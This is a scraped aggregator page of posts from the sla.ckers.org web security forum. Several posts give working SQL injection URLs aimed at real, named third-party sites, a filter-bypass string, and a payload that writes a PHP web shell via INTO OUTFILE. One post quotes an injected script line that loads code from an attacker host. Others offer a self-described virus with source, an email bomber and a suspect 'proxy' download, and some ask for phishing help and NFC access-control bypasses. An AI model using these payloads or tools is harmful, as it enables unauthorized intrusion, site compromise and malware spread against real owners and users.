Warning: fwrite() expects parameter 1 to be resource, boolean given in /var/www/www.schuirink.net/www/xml/headlines.php on line 383

Warning: fclose() expects parameter 1 to be resource, boolean given in /var/www/www.schuirink.net/www/xml/headlines.php on line 384
sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net
schuirink.net
main destinations: home | the web & the world | out of here
Google

news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

Proxy Browser - Surf the internet anonymously (no replies)


Proxy Browser is a windows application that will give you access to diferent proxy servers.

To use is quite simple:
1) Install the application
2) Run Proxy Browser
3) Type the address and surf the net

For a new proxy, close the window and run Proxy Browser again

EXTRA: Updates are available by email privateloader@hotmail.com

Download:
[www.firedrive.com]

Virustotal:
[www.virustotal.com]

Acer E1-510 - Windows 8.1 Resources Booster (no replies)


Optimize your Acer E1-150 or any windows 8.1 operating system making it run even faster by closing native aplications.


->Note: Consider use Autoruns from Microsoft to disable them...


Download:
https://www.mediafire.com/?qr3bdfg0f5x3o34

Virustotal:
https://www.virustotal.com/pt/file/a9899337344a2dd74fb42b1b9d790e7ce19186a8f9bf19587d8ca7e88367ab6c/analysis/1408141574/

XSS Scanner BETA 1.0 (no replies)


This software will scan a site looking XSS vulnerabilities.
It easy to use it only requires that a user type the address + search parameter in order to scan.

The scan is clean and if a vulnerability pass throw, an alert will popup with a vuln number.
Check the source to get the XSS code...

Warning: This is a new project, the XSS database is a bit small.

Download:
http://www.mediafire.com/download/0kbj6cd4vroussa/XSS_Scanner_BETA_1.0.rar

Virustotal:
https://www.virustotal.com/pt/file/e5ec7e5b22a095049908a0f20ba0a1e39ffe5d2c1570db3abaf3dfad9832662d/analysis/1407939128/

sql injection error with string pass (no replies)


please can anyone explain me how to fix error to inject it

http://www.pakcyber.com/portfolio.php?start=news

Sqli Injection Bypass (1 reply)


Hello ...

i have just a doubt please help

suppose we have 11 dynamic pages in a website like as

index.php?id=1 ( page ok )
index.php?id=2 ( page ok )
index.php?id=3 ( page ok )
index.php?id=4 ( page ok )
index.php?id=5 ( page ok )
index.php?id=6 ( page ok )
index.php?id=7 ( page ok )
index.php?id=8 ( page ok )
index.php?id=9 ( page ok )
index.php?id=10 ( page ok )
index.php?id=11 ( page ok )
index.php?id=12 ( Blank page no out put instantly )

security enabled : Mod_Security & comment escaped
mode security bypassed with /*!UNIunionON*/ ALL /*!SEselectLECT*/ but now the page shows same redirecting at single page suppose it 11th page
how can i bypass this security ?

i think injection is Time based Blind
Can i bypass such injections ??

[Virus] Windows 8 Resources Blocker + Source (no replies)


This is a virus for windows 8 and basically what it does is use the function taskkill to terminate common windows 8 executables.

Effects:
1) It will close various executables.
2) The CPU will go 100% as it work in a loop.

Check the source for more details.

Download:
http://www.firedrive.com/file/73E2817DD73AEEE7

Password:
http://tinyurl.com/pfganfq

any usefull auto database? (no replies)


Hi,

Does anyone knows of any usefull automotive database?

Hacked, cracked, etc

dom xss is possible ? (no replies)


dom xss is possible in ie browsers in code ?
<html>
<head>
<script language="JavaScript">
function onLoad() {
parent.setTimeout("zk.bmk.onIframeLoaded('"+window.location+"')",0);
}
</script>
</head>
<body onload="onLoad()">
</body>
</html>

is located in http://grepcode.com/file/repo1.maven.org/maven2/org.zkoss.zk/zk/6.5.1.1/web/js/zk/bookmark.html


in ie8 browser injection in url ');// error message zk undefined, bmk null or undefined.
How is reproduce injection dom xss ?

The sql injection (1 reply)


For this sql injection,how to bypass IT?

http://www.premises.com.au/residetails.php?id=6140725


http://www.premises.com.au/residetails.php?id=6140725'

NFC Security (no replies)


Hi guys,
I was redirected here by a friend, to ask few question I hope this thread can be not a once reply topic but a section were we'll disscuss about security in NFC Tags and Readers.
He tried to anwser few of my questions but hope for another anwsers.

I'm a 20 year old student, and my as my homework I got NFC security.
Before I start, let me tell you about my equipment, own this device and a tag (actually 3, tag the paper, a key, and a card).

w w w. s8.postimg.org/aek39k2it/photo1.jpg

Now my "homework" is to find a security hole/try to break it/ in school where the system is setuped as that the tag reader identifys a tag by ID of the tag and if the tag is located in the database it allows access to the room.

I need to get into it without knowing any tags, actually I know the, but thats not the point.

~Can NFC Tag ID be changed or can it be controled by a script ?
~ If so how ?

~Can I bruteforce NFC reader using HCE NFC phone / device ?
~ If so how ?

~Does the reader that I have ACS.com.hk manifacture ACR122 Keep logs ?
(tried to find out but without success)

That is for beggining hope you guys will help me with my study, would appriciate it very much.

Identify base64 looking text (no replies)


Hi,
while searching for injection points I came across a base64-type looking argument to id param. Can anyone help me identify what is it exacctly how to decode/encode it. It ain't base64, It tried decoding it.

http://u.laaptu.com/login1.action?id=0mYOgRQ6Hqmry/ianstwtUOz5SJOVqi59VoLNz0uwSE=

Exploitable (no replies)


Hi guys can you give me the status of this parameter ?

http://www.bhtelecom.ba/laptopi-detalji.html?&tx_ssgenericrenderer_pi1[uid]=12

edit smb_relay.rb (no replies)


Hello,
I have been trying to figure out how to modify the smb_relay.rb metasploit module to use the same session that is created for uploading a payload to a share, and use it to download all files in the share to /tmp/loot has anyone done this before? any help would be much appreciated. Thank you.

Change user (2 replies)


Is it possible to change user using sql injection ?
So you can get privilages ?

Greetings (1 reply)


Hello all,
I'm an unprofessional pentester/blackhat for hire who's looking to share knowledge and expand my current social circle with other knowledgeable people in the field, power in numbers y'know?

It's a pity this forum looks slightly dead for the current time, I hope that will change.

Cheers,
nopesled

injection alters javascript file (1 reply)


OK here's the dealio, I am asked to code a bookings page for a taxi firm I used to work for using PHP/mySQL. The owner won't pay much so I don't sanitize user input etc and generally do a half arsed job hoping, maybe, that i'll be asked back to do some more work on it and get paid more.
Well it kinda works out for me as some attacker manages to re-write an included javascript file so that it does this (appended to the included js file):
document.write('<script type="text/javascript" src="http://www.kyasshingu-shinsa-a1.asia/7nqth9gv.php?id=100737776"></script>');

So my question is this. How did he/she (the attacker) alter this file?
did they get the ftp password? if so how? what other avenues did/could they use to alter this file?

The js file only provided form validation, cvhecking if boxes were filled in etc.

P.S I won't be so negelectful in future even though I did get paid extra for sorting my own mess out!

Thanks for any insights in advance.

h! iam lggoloza (1 reply)


iam lggoloza from the china

be good at: Xss. linux Kernel driver. intranet penetration

Namaste! (1 reply)


Namaste, everyone,am new here,can anyone help me in Phishing!

another one (no replies)


http://www.recreatingeden.com/index.php?pid=8+order+by+5--+

i dont have permission ?_?

why this 400 bad request?? (5 replies)


order by and union all select works

but injections to retrieve data not^^ why?

http://www.piemontfungo.com/store/index.php?prod=1888+union+all+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database%28%29

i need to refresh my memory... (2 replies)


omg i need to remember some sqlinj^^

http://www.pubblicitafaidate.it/index.php?prod=96

easy inj for some of u^^ (no replies)


http://www.geldue.it/site/index.php?prod=1&cat=Prodotti%20Complementari%27

help

Breaking out of JS String Assignment? (no replies)


I have a user controlled JavaScript string which is assigned to a variable, e.g.

var s = '(my input)';

Only three characters are converted: ' < and >

< and > are replaced with < and > , respectively.

The single quote (' / %27) is replaced with

' + "'" + '

For example, an input of

a'b

will result in

var s = 'a' + "'" + 'b';

and an input of 'aa'bb' will result in

var s = '' + "'" + 'aa' + "'" + 'bb' + "'" + '';


\ and / are neither converted nor escaped, so I can insert things like \u0022 or \n and I can escape the trailing ' in the string assignment.

For example, I can insert 123\ which will result in

var s = '123\';

This breaks the JavaScript syntax but does not allow me to inject code that will be interpreted.

Any ideas how to break out?

finding sql vulnerable (2 replies)


hi all i'am finaly back :P

My question is more about how to find vulnerability website than how to hack it .

For exemple from now i use the dork

Inurl:productdetail.php?id=

for find website vulnerable to sql

and after finish the google list i try :

inurl:productdetail.php?id= intext:lord of ring

for find new website.

My problem is that nom i can write everything i whant in "intext" i still get the same website, not in the same order by all time the same

I try with other dork like :

inurl:index.php?id=

Once the list is down i do like before :

Inurl:index.php?id= intext:star wars

But like for productdetail.php?id= i got similare result just not in the same order ...

As you can see i mostly search for shop that is find more interesting for sql

So is there something i do wrong ? Or maybe there is other way to find websites?

Hola all (1 reply)


Hello everybody. I am Mg Ar Kr. Nice to meet u all and I am new at here.

I intrest in SQLi, XSS most.

Have a nice day :)

./end

Symfony 2.4 Security (no replies)


Guys you have any experience with symfony 2.4 any security vulnerabilities you are fimiliar with, what to be carefull about?

Regards

how to getshell (1 reply)


for this:
this can get data,but how to getshell
id=99 and extractvalue(1, concat(0x5c, (select datanase())))--

can't this
id=99 and extractvalue(1, concat(0x5c, (select '<?php system($_GET[1]);?>' into oufile '/var/www/god.php')))--

extractvalue() how to exploit "select into outfile" getshell

USSD Sender Hacktool 1.1 (2 replies)


What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly use to make requests to a mobile operator. If
you want to check how much money you have on your mobile sim card you can use a USSD Command for that. Entering for
example *#100# to the vodafone network, you will receive an USSD message as a result.

USSD Sender Hacktool is a complex tool that let any web user to send a text message in a USSD command to any number. By
default the message is "You have been hacked!" but you can send any text. In the target phone a message will pop up
with the text and a OK button. If it get's undelivered an actual sms will be send.

Virustotal:
https://www.virustotal.com/en/file/a22e6d2879479d41a01591a925bea2efe49ddd07a91880f4f642f306d5a8eb55/analysis/1397761754/

MailChimp Email Bomber 1.0 source (1 reply)


This app will send mail to your mailbox. Win the possibility of winning $5.00 dollars by paypal just by sending an email to privateloader@iol.pt

Download:
http://www.datafilehost.com/d/dcd700c6

Virustotal:
https://www.virustotal.com/en/file/1e31051b968a011da2cdfe78cf69fdb8f23a5149a90e1ad3c6f36e1b31811c2a/analysis/1397759634/

CSRF -- Add extra cookie value (1 reply)


Hello All,
I am trying to demonstrate weak CSRF token implementation.
The request structure is something similar to following:

POST /abc HTTP/1.1

Cookie = JSESSIONID=xxxxxxx ; Token = yyyyyyyy

somename= somevalue
token = yyyyyyyy


The token value is not random and can be easily guessed.


We can control "token=" in POST body but we also need to change "token=" value from Cookies: to make both values identical.

I tried to set extra cookie parameter using php, JS but that parameter not getting inserted in actual CSRF request when user clicks on submit button.

Any suggestions?